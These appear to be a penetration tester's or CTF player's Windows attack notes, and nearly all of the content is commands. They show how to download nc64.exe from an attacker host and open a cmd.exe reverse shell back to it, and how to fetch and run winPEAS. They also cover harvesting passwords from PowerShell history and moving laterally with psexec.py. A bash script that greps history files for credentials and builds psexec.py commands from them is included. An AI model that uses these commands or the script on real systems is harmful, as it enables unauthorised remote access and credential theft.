Windows


Reverse shell:

  1. On the attacking host, serve the binary and start a listener: python3 -m http.server 8000 and nc -lvnp 9001
  2. Download nc64.exe onto the target: powershell -c wget http://10.10.15.101:8000/nc64.exe -outfile nc64.exe
  3. Execute the revshell (connects back to the listener on 9001): .\nc64.exe -e cmd.exe 10.10.15.101 9001

Vulnerability discovery:

  1. Download winPEAS (e.g. winPEASx64.exe from the PEASS-ng releases)
  2. Download it onto the target and run it: powershell -c wget http://10.10.15.101:8000/winPEASx64.exe -outfile winPEASx64.exe ; .\winPEASx64.exe
  3. Read a file with type <file_path> (cmd) or Get-Content <file_path> (PowerShell)
  4. Get the PowerShell command history from C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt (the exact path is returned by (Get-PSReadLineOption).HistorySavePath); it often contains passwords typed on the command line
  5. psexec.py from Impacket to get an interactive shell (like SSH) as a given user: psexec.py <domain>/<user>:<password>@<target>. The account needs local admin rights on the target, because psexec.py writes a service binary to the ADMIN$ share.
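Steps 4 and 5 chain together: credentials left in ConsoleHost_history.txt are exactly what psexec.py needs. The bash script below is an added example, not part of the original notes: it greps a copied history file for credential-looking lines and turns any "net use \\host\share ... /user:DOMAIN\user password" line into the matching psexec.py invocation. The history content, the host 10.10.10.5 and the CORP\svc_backup account are constructed for the example.

```shell
#!/usr/bin/env bash
# Triage a PSReadLine ConsoleHost_history.txt for credentials and turn a
# "net use" line into a psexec.py command. Added example, not from the original notes.

# Lines worth a second look: passwords on the command line, runas, net use,
# SecureString creation. Matched case-insensitively.
CRED_PATTERN='password|passwd|/user:|-credential|convertto-securestring|asplaintext|runas|net use'

# Print matching lines with their line numbers. Never fails under set -e.
find_credential_lines() {
    grep -inE "$CRED_PATTERN" "$1" || true
}

# Convert "net use \\host\share ... /user:DOMAIN\user password" into
# psexec.py 'DOMAIN/user:password@host'. Accepts the password before or after
# /user: and skips drive letters (X:) and other /switches. The password is
# assumed to be a single token; quote it by hand if the real one has spaces.
net_use_to_psexec() {
    awk '
    tolower($1) == "net" && tolower($2) == "use" {
        host = ""; user = ""; pw = ""
        for (i = 3; i <= NF; i++) {
            t = $i
            if (t ~ /^\\\\/) {                       # \\host\share -> host
                host = t; sub(/^\\\\/, "", host); sub(/\\.*$/, "", host)
            } else if (tolower(t) ~ /^\/user:/) {    # /user:DOMAIN\user
                user = substr(t, 7)
            } else if (t !~ /^\// && t !~ /:$/ && host != "") {
                pw = t                               # bare token after the UNC path
            }
        }
        if (host != "" && user != "") {
            sub(/\\/, "/", user)                     # DOMAIN\user -> DOMAIN/user
            printf "psexec.py \047%s:%s@%s\047\n", user, pw, host
        }
    }' "$1"
}

# Constructed sample history (not captured from a real host).
HISTORY_FILE=$(mktemp)
printf '%s\n' \
  'Get-ChildItem C:\Users' \
  'net use \\10.10.10.5\C$ /user:CORP\svc_backup B4ckup!2023' \
  '$p = ConvertTo-SecureString "Winter2023!" -AsPlainText -Force' \
  'Get-Process' \
  'runas /user:Administrator cmd.exe' \
  'type C:\Windows\System32\drivers\etc\hosts' > "$HISTORY_FILE"

echo "[*] credential-looking lines:"
find_credential_lines "$HISTORY_FILE"
echo "[*] psexec.py command derived from net use:"
net_use_to_psexec "$HISTORY_FILE"
```

On a real engagement, copy ConsoleHost_history.txt off the target first (for example through the nc64.exe session or an SMB share) and point find_credential_lines at that copy; the grep pattern is a starting list, extend it with whatever naming the target environment uses.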